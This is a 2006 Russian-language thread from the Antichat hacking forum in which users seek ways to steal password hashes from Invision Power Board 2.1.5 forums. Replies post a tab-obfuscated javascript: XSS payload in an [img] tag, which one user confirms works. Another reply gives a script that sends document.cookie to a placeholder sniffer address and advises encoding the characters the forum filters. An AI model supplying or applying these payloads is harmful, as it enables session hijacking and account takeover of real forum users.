HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Invision 2.1.5 Xss
  #1  
Старый 09.04.2006, 12:37
sexxx
Новичок
Регистрация: 03.04.2006
Сообщений: 8
С нами: 10582172

Репутация: 0
По умолчанию Invision 2.1.5 Xss

Вобшем как можно унать хэш на это версии движка,
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
 
Ответить с цитированием

  #2  
Старый 09.04.2006, 12:40
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

Цитата:
помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
а попробовать? не работает.
 
Ответить с цитированием

  #3  
Старый 09.04.2006, 12:53
iNcluDe
Новичок
Регистрация: 07.03.2006
Сообщений: 18
С нами: 10619943

Репутация: 3
По умолчанию

Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4
 
Ответить с цитированием

  #4  
Старый 09.04.2006, 13:52
sexxx
Новичок
Регистрация: 03.04.2006
Сообщений: 8
С нами: 10582172

Репутация: 0
По умолчанию

Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.
 
Ответить с цитированием

  #5  
Старый 09.04.2006, 14:22
member_ru
Познающий
Регистрация: 08.12.2005
Сообщений: 59
С нами: 10747925

Репутация: 5
По умолчанию

sexxx, никак, пока XSSбаги там не нашли.
 
Ответить с цитированием

  #6  
Старый 09.04.2006, 15:30
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами: 10946149

Репутация: 116


По умолчанию

Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
Можно через аватарку попробовать вроде бы. Но это только под Ie.
 
Ответить с цитированием

  #7  
Старый 09.04.2006, 20:49
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
С нами: 10652006

Репутация: 37
По умолчанию

вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]
 
Ответить с цитированием

  #8  
Старый 09.04.2006, 21:56
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами: 10646246

Репутация: 34
По умолчанию

Цитата:
Сообщение от CinerX  
вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

[img]j a v a s c r i p t:alert(/XSS/).jpg[/img]
Работает спасибо ))
а теперь после того как получил алерт что мне делать?
заранее спасибо
 
Ответить с цитированием

  #9  
Старый 09.04.2006, 21:47
Noth!nG
Познающий
Регистрация: 08.03.2006
Сообщений: 32
С нами: 10618923

Репутация: 10
По умолчанию

Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

P.S.: В инете искать пробовали?
 
Ответить с цитированием

  #10  
Старый 10.04.2006, 01:38
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
С нами: 10652006

Репутация: 37
По умолчанию

тебе ввобщем надо получить куки припомощи JavaScript.
вот пример:

<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Invision 1.3 Xss ? slider Уязвимости CMS / форумов 6 01.06.2006 13:01
Уязвимость Invision Power Board 2.1.5 Go0o$E Уязвимости CMS / форумов 106 05.05.2006 21:35
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Уязвимости CMS / форумов 12 15.02.2005 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...